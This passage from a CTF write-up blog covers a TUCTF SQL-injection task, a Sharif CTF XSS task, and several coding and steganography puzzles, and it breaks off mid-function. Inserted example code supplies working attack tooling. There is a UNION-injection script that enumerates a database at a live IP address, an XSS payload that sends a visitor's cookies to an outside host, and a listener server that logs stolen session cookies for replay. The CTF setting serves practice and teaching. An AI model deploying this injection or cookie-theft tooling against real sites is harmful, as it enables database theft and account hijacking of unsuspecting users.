<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzLuQvsIBcp8pC6PStJrNSBvJQxZKhUTJezftOhn6qCHzOXMEUof-gYwALG5A4UQmWl95wFJFhBXj2_45FQlVUCEhCoVtEL8_QWIAxg2sGW-ffEUO0AmSpMTl8TeIAQsWy8hOBJPIRmKR/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzLuQvsIBcp8pC6PStJrNSBvJQxZKhUTJezftOhn6qCHzOXMEUof-gYwALG5A4UQmWl95wFJFhBXj2_45FQlVUCEhCoVtEL8_QWIAxg2sGW-ffEUO0AmSpMTl8TeIAQsWy8hOBJPIRmKR/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Line 46 is vulnerable to SQL injection, but line 50 shows the data is sent with an md5 hash to postQuery.php by AJAX.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXfD7ahr_RaFHGVZr6VzalI3_izxEuz4Zj1O9l9eQKGdCqhFZuG4y10zMYroGZeEMqKsi1y9M9bXt8uxp91r0-ht8NejM-eOvkTn6upopzFnDWiJ91hlbWwsatkpCprMRmnSfj69Plm2/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXfD7ahr_RaFHGVZr6VzalI3_izxEuz4Zj1O9l9eQKGdCqhFZuG4y10zMYroGZeEMqKsi1y9M9bXt8uxp91r0-ht8NejM-eOvkTn6upopzFnDWiJ91hlbWwsatkpCprMRmnSfj69Plm2/s400/3.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. In the Response tab, I found a comment that reveals the SQL query statement.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQQ-o44K-MQhQKUvFOYI4YjJx8eXIcHE-_aQh3Jli1wVrlIGvRXPxNGVDPWvC4fJmR-7Hnbrtwj0M2wsh_7fECApQShMZ2IWjI09eOJfkZ_5VX_ITjZ77GoswEfC50JQen7wGsYQ47UoJ2/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQQ-o44K-MQhQKUvFOYI4YjJx8eXIcHE-_aQh3Jli1wVrlIGvRXPxNGVDPWvC4fJmR-7Hnbrtwj0M2wsh_7fECApQShMZ2IWjI09eOJfkZ_5VX_ITjZ77GoswEfC50JQen7wGsYQ47UoJ2/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. I wrote a Python script to extract data step by step. Found database: <b>tuctf</b>, tables: <b>tuctf_grades, tuctf_info, tuctf_junk</b>, columns: <b>item, value</b>, and the flag is stored in <b><span style="color: red;">tuctf_info</span></b>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZIpkNF9K5J9wuaPqOF2UQYEIwNAOZqcWvRq_Pg4uT01EjC6G_xzTeAcrqc2fgDilYTv4iHuxqWNKAQkEUKXB5wcnoQeLaJWcPJvyZonz8dkdohZGjD2v9-CewjK6Ts2jOdfmi3_AJzEH/s1600/10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZIpkNF9K5J9wuaPqOF2UQYEIwNAOZqcWvRq_Pg4uT01EjC6G_xzTeAcrqc2fgDilYTv4iHuxqWNKAQkEUKXB5wcnoQeLaJWcPJvyZonz8dkdohZGjD2v9-CewjK6Ts2jOdfmi3_AJzEH/s400/10.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiv4uj0ZGqiIdgw-gt8DMVD91LtGCRzz6wOKhQiRAybKcizdtdwpUu0c8PRYtwXxeMY9SD2xoQqJbEgv09zLfF4V-SOUmbmPnpt0TFKSVeS5-HQnJu7vROiiQj0BrTAdXgWK1Db_r5rLP9/s1600/8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiv4uj0ZGqiIdgw-gt8DMVD91LtGCRzz6wOKhQiRAybKcizdtdwpUu0c8PRYtwXxeMY9SD2xoQqJbEgv09zLfF4V-SOUmbmPnpt0TFKSVeS5-HQnJu7vROiiQj0BrTAdXgWK1Db_r5rLP9/s400/8.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. select value from tuctf_info</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ELHKyMC_HTEGiJvRrbgnfTRKDyrIg5mRMED-JaLnOdRwg22nXjVkBa4CNMNHfuUBxJebfevtQHsJSrRehk6sOSXsDDmmFO66Ls17O2oTkryZ3vCo_vFtkUwKidwoYjx9Y_JqK4KVmZMw/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ELHKyMC_HTEGiJvRrbgnfTRKDyrIg5mRMED-JaLnOdRwg22nXjVkBa4CNMNHfuUBxJebfevtQHsJSrRehk6sOSXsDDmmFO66Ls17O2oTkryZ3vCo_vFtkUwKidwoYjx9Y_JqK4KVmZMw/s400/9.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Python Script:</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<script src="https://gist.github.com/icheernoom/1a388a49510a67b9a4b8a5ec1d89b08d.js"></script></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
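The enumeration ladder of steps 6 and 7 (database, then tables, then columns, then the flag) is the usual walk down MySQL's information_schema. The Python below is an added example, not the author's gist above: postQuery.php is the endpoint named in step 4, but the POST parameter name <b>name</b>, the single-column quoted string context and the <b>[[ ... ]]</b> marker trick used to find the injected value in the HTML are assumptions, so adapt payload() to the real query revealed by the comment in step 5. The script posts the raw payload directly and therefore bypasses the page's JavaScript; the sample response is constructed so the parsing part runs offline.

```python
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# postQuery.php is the endpoint named in the write-up; the parameter name and the
# quoted single-column context ( ... WHERE name='<input>' ) are assumptions.
TARGET = "http://104.199.151.39/postQuery.php"
PARAM = "name"

# MySQL information_schema ladder: databases -> tables -> columns -> data.
STEPS = {
    "databases": "SELECT group_concat(schema_name) FROM information_schema.schemata",
    "tables": "SELECT group_concat(table_name) FROM information_schema.tables "
              "WHERE table_schema='tuctf'",
    "columns": "SELECT group_concat(column_name) FROM information_schema.columns "
               "WHERE table_name='tuctf_info'",
    "flag": "SELECT group_concat(value) FROM tuctf_info",
}

MARK_L, MARK_R = "[[", "]]"   # delimiters that make the injected value easy to find in HTML


def payload(subquery: str) -> str:
    """Close the quoted string, UNION in the subquery wrapped in markers, comment out the tail."""
    return f"' UNION SELECT concat('{MARK_L}',({subquery}),'{MARK_R}')-- -"


def extract(body: str) -> list:
    """Pull every marker-delimited value out of a response and split the group_concat list."""
    hits = re.findall(re.escape(MARK_L) + r"(.*?)" + re.escape(MARK_R), body, re.S)
    return [value for hit in hits for value in hit.split(",")]


def query(subquery: str) -> str:
    """POST the raw payload straight to postQuery.php, bypassing the page's JavaScript."""
    data = urlencode({PARAM: payload(subquery)}).encode()
    with urlopen(Request(TARGET, data=data), timeout=10) as resp:
        return resp.read().decode(errors="replace")


def enumerate_all() -> dict:
    """Run the whole ladder against the live target; returns {step: [values]}."""
    return {step: extract(query(sql)) for step, sql in STEPS.items()}


# Constructed response (not captured from the challenge) so the parser can be exercised offline.
SAMPLE_RESPONSE = "<tr><td>Name</td><td>[[tuctf_grades,tuctf_info,tuctf_junk]]</td></tr>"

if __name__ == "__main__":
    print(payload(STEPS["tables"]))
    print(extract(SAMPLE_RESPONSE))   # offline demo of the parser
    # print(enumerate_all())          # live run against the challenge box
```

If the real query has more than one column, pad the UNION with NULLs until the injected row is accepted; the markers keep the extraction code unchanged.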
<div class="separator" style="clear: both; text-align: left;">
<b>Flag:</b> <b><span style="color: red;">TUCTF{v4ccinate_y0ur_databa5e5}</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-63867639845270446232016-02-22T16:41:00.001+07:002016-02-22T16:41:55.704+07:00Internetwache CTF 2016: It's Prime Time! (Code) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
We all know that prime numbers are quite important in cryptography. Can you help me to find some?</blockquote>
<b>Solution: </b><br />
<br />
<script src="https://gist.github.com/icheernoom/6bf8b66d7afc9a53e7c5.js"></script>
<br />
<b>Flag:</b> <b><span style="color: red;">IW{Pr1m3s_4r3_!mp0rt4nt}</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-35992414380725102752016-02-22T16:30:00.000+07:002016-02-22T16:30:27.955+07:00Internetwache CTF 2016: A numbers game (Code) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
People either love or hate math. Do you love it? Prove it! You just need to solve a bunch of equations without a mistake.</blockquote>
<b>Solution: </b><br /><br />
<script src="https://gist.github.com/icheernoom/fb0008e22932edca42bf.js"></script>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWq8obTalOQSpXWLFmNqZ7wisRbmdkaoopBHD-vPSaPAWZlCLgtR8xuBfPY-wPYsNgEt8d6eT4Di3EYqoeX_ExmRgx7vQI-shOQX_O6M-ZQMsUsSFIqLudHEnslaE2jS0cGirwWC080UhB/s1600/12728958_10205830437545482_6058617821005961113_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWq8obTalOQSpXWLFmNqZ7wisRbmdkaoopBHD-vPSaPAWZlCLgtR8xuBfPY-wPYsNgEt8d6eT4Di3EYqoeX_ExmRgx7vQI-shOQX_O6M-ZQMsUsSFIqLudHEnslaE2jS0cGirwWC080UhB/s400/12728958_10205830437545482_6058617821005961113_n.jpg" width="400" /></a></div>
<br />
<b>Flag:</b> <b><span style="color: red;">IW{M4TH_1S_34SY}</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-8606762805057341522016-02-07T01:32:00.000+07:002016-02-10T23:55:48.193+07:00Sharif CTF 2016: PhotoBlog (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The Blog</blockquote>
<b>Solution:</b><br />
<br />
1. Accessing the blog, I found input fields (user, comment, captcha); user and comment are vulnerable to <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)">Cross-site Scripting (XSS)</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_rVDbGW-981uAZI0HPVHhEkU1a8PoyaGhrA86GEBH7Pg3OnTGUnVmGcjY6smZx_9hBEWFXw1ka096XCIKIpR-UMuiFmuoaW4dQq6Zh8zkPqYGEDNWs7Xx7rDAkphECNgH5ga2bt6IVfJU/s1600/blog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_rVDbGW-981uAZI0HPVHhEkU1a8PoyaGhrA86GEBH7Pg3OnTGUnVmGcjY6smZx_9hBEWFXw1ka096XCIKIpR-UMuiFmuoaW4dQq6Zh8zkPqYGEDNWs7Xx7rDAkphECNgH5ga2bt6IVfJU/s1600/blog.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. The description says "want to login as admin", so I crafted JavaScript to steal the admin's cookie and put it in a comment.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<pre class="brush:[php];">&lt;script&gt;new Image().src = 'http://www.my.site/icheernoom.php?cookies=' + encodeURI(document.cookie);&lt;/script&gt;</pre>
<br />
3. After a minute, a cookie shows up in my site's access log.<br />
<pre class="brush:[php];">/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82</pre>
<br />
4. "Login as admin": I guessed the admin page is /admin.php, found it, and it redirected to /login.php. I then accessed it with the admin's cookie.<br />
<br />
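The receiving side of the payload in step 2, as an added example that is not part of the original write-up: a small Python listener that takes the place of icheernoom.php. It parses the <b>cookies</b> query string that document.cookie plus encodeURI produces (cookies joined by "; ", with "=", ";" and "&amp;" left unencoded), appends the result to a log file and answers with a tiny GIF so the victim's image request completes quietly. The port and the log file name are assumptions.

```python
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

LOG_PATH = "stolen_cookies.log"   # assumed file name, not from the write-up


def parse_report(path: str) -> dict:
    """Parse the request path the payload produces, e.g.
    /icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82

    document.cookie joins cookies with '; ' and encodeURI leaves '=', ';' and '&'
    untouched, so everything after 'cookies=' is taken as the cookie string and
    split on ';' after one round of URL decoding.
    """
    match = re.search(r"(?:^|&)cookies=(.*)$", urlsplit(path).query)
    if not match:
        return {}
    cookies = {}
    for part in unquote(match.group(1)).split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


class CatchHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = parse_report(self.path)
        with open(LOG_PATH, "a") as fh:
            fh.write(f"{self.client_address[0]} {self.headers.get('User-Agent', '-')} {cookies}\n")
        # Answer as an image so the victim's <img> load completes without a console error.
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")

    def log_message(self, fmt, *args):   # keep stdout quiet; the log file is the record
        pass


def serve(port: int = 8000):
    HTTPServer(("0.0.0.0", port), CatchHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Point the payload's URL at this host and port, then watch LOG_PATH for the PHPSESSID value to replay in Burp as in step 4.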
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkd7EENl7nYRdjjkGE0yryIyPzmgsUAWMB6-Zpdsbx8jOxfGObZhaXA8X-g8iF54oyszmuII0YlSOYjQ8RtRBVKVphtA4_6WCZ54GGWrrE4-ezHY0UttZ42tus5-6DUs_ZyA19Zq2etfHW/s1600/burp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkd7EENl7nYRdjjkGE0yryIyPzmgsUAWMB6-Zpdsbx8jOxfGObZhaXA8X-g8iF54oyszmuII0YlSOYjQ8RtRBVKVphtA4_6WCZ54GGWrrE4-ezHY0UttZ42tus5-6DUs_ZyA19Zq2etfHW/s400/burp.png" width="400" /></a></div>
<br />
<b>Flag:</b> <b><span style="color: red;">1b7a60600d5731739c0e2115bd4ebf7c</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-9216347449487707772015-11-21T17:36:00.000+07:002015-11-23T11:52:42.137+07:00Hack Dat Kiwi 2015: Phone Lock (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
A friend of mine forgot her phone password. I told her you're the hacker! Go get 'em tiger.</blockquote>
<b>Solution:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU9zVQQEX7cnU0YOVSo5Y_41JYckismjlRyJYhcARPXdnTtyGErTQ7ZLjx1Kb0zH1A7OA0eNZ6PEUjEGW8qUwUKPLz3gaO73Pt4cNxlyOIDsaiTmIBaClRuhoqW2fz7CmzVJT4ZPoSLMLa/s1600/phone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU9zVQQEX7cnU0YOVSo5Y_41JYckismjlRyJYhcARPXdnTtyGErTQ7ZLjx1Kb0zH1A7OA0eNZ6PEUjEGW8qUwUKPLz3gaO73Pt4cNxlyOIDsaiTmIBaClRuhoqW2fz7CmzVJT4ZPoSLMLa/s320/phone.png" width="269" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk54lHVSMKq3xNTNytKpIW6ivn9kh18YQIOZ1A9p9E7DceFTAK1LnU-_Sz-tdnVpIb-a4cIgFFmQt3aBToHFf6O_C28-6RqQQchLQGBBb8zYF4b6jA9KD38FkdwbPo-Z1ouso-7nF8RsvR/s1600/js.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk54lHVSMKq3xNTNytKpIW6ivn9kh18YQIOZ1A9p9E7DceFTAK1LnU-_Sz-tdnVpIb-a4cIgFFmQt3aBToHFf6O_C28-6RqQQchLQGBBb8zYF4b6jA9KD38FkdwbPo-Z1ouso-7nF8RsvR/s320/js.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It uses JavaScript to validate, and I just wrote the Python script below to solve it.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<script src="https://gist.github.com/icheernoom/8efbb4a05e02d5e4dfff.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFKGB_dSqEHuqOpRkzeHAwR_wmuDKyT7viPdb7dLNY9LhBfdG565VpQ98uaVkId8qlFQIyU7hvtyOITGSwGgz6enzY8FPwv3qkA4JbigEJMF7ISvp1NYAkHoqRkOkZotJJXvFLpVE_K5V/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFKGB_dSqEHuqOpRkzeHAwR_wmuDKyT7viPdb7dLNY9LhBfdG565VpQ98uaVkId8qlFQIyU7hvtyOITGSwGgz6enzY8FPwv3qkA4JbigEJMF7ISvp1NYAkHoqRkOkZotJJXvFLpVE_K5V/s320/flag.png" width="276" /></a></div>
<br />
<b>Flag:</b> <b><span style="color: red;">98635f80048b8abbd71e9bb55958a6c8</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-2357082599876792202015-11-04T20:21:00.002+07:002015-11-04T20:21:14.929+07:00School CTF 2015: Meaningless Text (Stegano) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
It is absolutely meaningless <a href="http://school-ctf.org/files/task12_5b01f6a519d9a567ca098416e1499f8464e10c0c.html">text</a>, isn't it?</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. Viewing the page source, I think it is just a pattern in &lt;em&gt;&lt;/em&gt; tags, and I get words like <b>"flag is not this line but you think right way"</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUnQ3DygIbcgKz-8gSwgs2No97A7dpvboefmJkfFyP5wES1aywImboy8JKwCEM4toQpImp1g-hcSsTKtesqZAelSAND870qA6EmxSU7rEklIya-R1IkzCCLJFB8UjX2n5oWCn32wjz1Gdh/s1600/txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUnQ3DygIbcgKz-8gSwgs2No97A7dpvboefmJkfFyP5wES1aywImboy8JKwCEM4toQpImp1g-hcSsTKtesqZAelSAND870qA6EmxSU7rEklIya-R1IkzCCLJFB8UjX2n5oWCn32wjz1Gdh/s400/txt.png" width="400" /></a></div>
<br />
2. View the source again and look at the &lt;e&gt;&lt;/e&gt; tags: there are &lt;e&gt;one&lt;/e&gt; and &lt;e&gt;zero&lt;/e&gt;, yeah, it is binary!!<br />
<br />
3. The Python script below solves it.<br />
<br />
<script src="https://gist.github.com/icheernoom/6a1a8118ed5ccdf6ce45.js"></script>
Good job. :D
<br />
<br />
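A decoder for the pattern in steps 2 and 3, added here as an example (the author's own script is in the gist above and is not reproduced): it collects the &lt;e&gt;one&lt;/e&gt; / &lt;e&gt;zero&lt;/e&gt; tags in document order, ignores the &lt;em&gt; decoy text because the tag name must be exactly "e", and packs the bits into bytes. The sample HTML is constructed inside the script, so it runs offline.

```python
import re


def encode(text: str) -> str:
    """Constructed sample generator: each character becomes eight <e>one</e>/<e>zero</e>
    tags, mimicking the task page (the real page is not reproduced here)."""
    words = {"1": "one", "0": "zero"}
    return "".join(f"<e>{words[b]}</e>" for ch in text for b in format(ord(ch), "08b"))


def decode(html: str) -> str:
    """Collect <e>one</e>/<e>zero</e> in document order and pack the bits into bytes.
    <em>...</em> decoy text does not match: the tag name must be exactly 'e'."""
    words = re.findall(r"<e>\s*(one|zero)\s*</e>", html, re.I)
    bits = "".join("1" if w.lower() == "one" else "0" for w in words)
    full = len(bits) - len(bits) % 8          # drop a trailing partial byte
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, full, 8))


# Constructed stand-in for the task page: decoy <em> text followed by the encoded flag.
SAMPLE_HTML = (
    "<html><body>"
    "<em>flag is not this line but you think right way</em>\n"
    + encode("flag_is_this_is_a_simple_stego")
    + "</body></html>"
)

if __name__ == "__main__":
    print(decode(SAMPLE_HTML))
```

For the real task, read the downloaded HTML file and pass its contents to decode().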
<b>Flag:</b> <b><span style="color: red;">flag_is_this_is_a_simple_stego</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-70480013583957764772015-11-04T20:21:00.001+07:002015-11-04T23:30:13.222+07:00School CTF 2015: Cipollino, little onion (Admin) Write-up<b>Description:</b><br />
<div>
<blockquote class="tr_bq">
Do you like containers as we do?</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. Rename an extension from jpg to rar.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieSFirhvUDEtR2g79DCIYQWaVXU8W6Mq4SaVHACpALvGPvDcBqwGtANWYrUUzMu9ONvKWNpyXn9VrN-TvnuScSXVDhyT8T9hUS2I5-Pq7IIMw67QpwEVPES-2mjfNN1eZLO0LTegjmJdWV/s1600/image_1cfb4379b82626f0b5d28129ddb5918f8c010aa8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieSFirhvUDEtR2g79DCIYQWaVXU8W6Mq4SaVHACpALvGPvDcBqwGtANWYrUUzMu9ONvKWNpyXn9VrN-TvnuScSXVDhyT8T9hUS2I5-Pq7IIMw67QpwEVPES-2mjfNN1eZLO0LTegjmJdWV/s320/image_1cfb4379b82626f0b5d28129ddb5918f8c010aa8.jpg" width="320" /></a></div>
<br />
<br />
2. Get a QRCode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX8eNPZuSkuZgDrY_FG-Dq1XefrmWTVpf3uDSXUaT_tr-8PPTFGAtstEWtQi3kTNuLhO1jr-AGFzsRiG6ygM8MpF7FHiH-C1wgTcZgXKIeBNOJSupXc7DnD4UV_-f1RVHwR-1Wx4icu1U7/s1600/6.qrcode.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX8eNPZuSkuZgDrY_FG-Dq1XefrmWTVpf3uDSXUaT_tr-8PPTFGAtstEWtQi3kTNuLhO1jr-AGFzsRiG6ygM8MpF7FHiH-C1wgTcZgXKIeBNOJSupXc7DnD4UV_-f1RVHwR-1Wx4icu1U7/s320/6.qrcode.png" width="320" /></a></div>
<br />
<br />
3. Decode the QR code at <a href="https://zxing.org/w/decode.jspx">https://zxing.org/w/decode.jspx</a>, which gives C++ code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIf-cRYwAPGzIfzTF03KJLQCG1sb2u1l5Aygo7e93-z91iL5Mp8m7-LvY-blKNNoWUD7Txt0ZdQO1WxlN-2hcIJtHxLU51iGuVqg4OkbHj1ZcWDmwwe_o2yKhDHcC4gN_x-_bMZGVPWe2V/s1600/decodec%252B%252B.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIf-cRYwAPGzIfzTF03KJLQCG1sb2u1l5Aygo7e93-z91iL5Mp8m7-LvY-blKNNoWUD7Txt0ZdQO1WxlN-2hcIJtHxLU51iGuVqg4OkbHj1ZcWDmwwe_o2yKhDHcC4gN_x-_bMZGVPWe2V/s400/decodec%252B%252B.png" width="400" /></a></div>
<br />
4. Compile and run in <a href="http://www.tutorialspoint.com/compile_cpp_online.php">http://www.tutorialspoint.com/compile_cpp_online.php</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBsspsUef0Kl94LQbz9VU-BygPeHbO40M_JNxsYV5r-O4lXe7HGHTyTcMfPYXdO5kkY1ilHEVqbmumSyCw-vZaZ_GvaaeAbesxbJnvTdRkXT7NyH8NX3qwhMPTZroRi_BVdSF9WVSibaza/s1600/compile_run.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBsspsUef0Kl94LQbz9VU-BygPeHbO40M_JNxsYV5r-O4lXe7HGHTyTcMfPYXdO5kkY1ilHEVqbmumSyCw-vZaZ_GvaaeAbesxbJnvTdRkXT7NyH8NX3qwhMPTZroRi_BVdSF9WVSibaza/s400/compile_run.png" width="400" /></a></div>
<br />
5. Replace ", " and "0x" with nothing to get a hex string; decoding it gives a base64 string.<br />
<br />
<br />
B64'YSA9ICc3MCA3NiA2NSA3MSA5NSA3MSA0OCA2OCA5NSA2OCA2NSA3NyA3OCA5NSA2NiA4MiA0OCA5NSA4NSA5NSA4MiA5NSA4MyA0OCA5NSA2NyA0OCA0OCA3NiA5NSA2OCA2OSA2NyA4MiA4OSA4MCA4NCA3OSA4MicKCm1hcz1bXQoKbWFzPWEuc3BsaXQoJyAnKQoKZm9yIGkgaW4gcmFuZ2UobGVuKG1hcykpOgoJYj1pbnQobWFzW2ldKQoJYz1oZXgoYikKCXByaW50KGMsIGVuZD0nICcpCgpwcmludCgnJyk='<br />
<br />
6. Base64-decode it to get Python code, then run it.<br />
<br />
<pre class="brush:[python];">a = '70 76 65 71 95 71 48 68 95 68 65 77 78 95 66 82 48 95 85 95 82 95 83 48 95 67 48 48 76 95 68 69 67 82 89 80 84 79 82'

mas=[]

mas=a.split(' ')

for i in range(len(mas)):
    b=int(mas[i])
    c=hex(b)
    print(c, end=' ')

print('')</pre>
<br />
7. Result from python code.<br />
<br />
0x46 0x4c 0x41 0x47 0x5f 0x47 0x30 0x44 0x5f 0x44 0x41 0x4d 0x4e 0x5f 0x42 0x52 0x30 0x5f 0x55 0x5f 0x52 0x5f 0x53 0x30 0x5f 0x43 0x30 0x30 0x4c 0x5f 0x44 0x45 0x43 0x52 0x59 0x50 0x54 0x4f 0x52<br />
<br />
8. Hex-decode it (spaces and 0x prefixes removed).<br />
<br />
464c41475f4730445f44414d4e5f4252305f555f525f53305f4330304c5f444543525950544f52<br />
<br />
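Steps 5 to 8 peel the same kinds of layer by hand: a list of 0x bytes, a hex string, a base64 string, a list of decimal byte values. The following Python is an added example, not part of the original write-up: peel() applies these four rules repeatedly until the result matches none of them or is no longer printable text, so the hex string in step 8 and the decimal list in step 6 both come out as the flag in one call, while a base64 layer whose content is source code (as in step 5) stops at that source. The short base64 sample in the demo is constructed.

```python
import base64
import re


def _text(raw: bytes):
    """Return the bytes as str only if they look like printable text, else None."""
    s = raw.decode("latin-1")
    return s if all(32 <= ord(c) < 127 or c in "\r\n\t" for c in s) else None


def peel_once(data: str):
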